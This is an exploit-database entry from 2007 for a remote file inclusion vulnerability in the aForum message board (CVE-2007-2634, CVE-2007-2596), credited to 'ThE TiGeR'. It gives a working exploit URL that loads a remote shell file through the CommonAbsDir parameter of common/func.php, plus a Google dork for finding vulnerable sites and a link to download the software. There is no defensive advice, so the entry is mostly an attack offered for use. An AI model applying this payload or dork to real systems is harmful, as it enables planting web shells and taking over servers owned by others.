aForum 1.32 - 'CommonAbsDir' Remote File Inclusion



EKU-ID: 11849 CVE: OSVDB-35907;CVE-2007-2634;OSVDB-35906;CVE-2007-2596 OSVDB-ID:
Author: ThE TiGeR Published: 2007-05-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#AForum =>1.33 Remote file inclusion (Func.php)

#Download Script : http://www.agner.org/software/msgbrd2/aforum.zip

#Thanks Str0ke

#D0rk:allintitle:List of messageboards

#Exploit :

#http://localhost/[aforum_path]/common/func.php?CommonAbsDir=shell.txt?

#Discovered By : ThE TiGeR

#Greetz : Reda, â„¢~${{BraveHeart}}$~â„¢

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-09]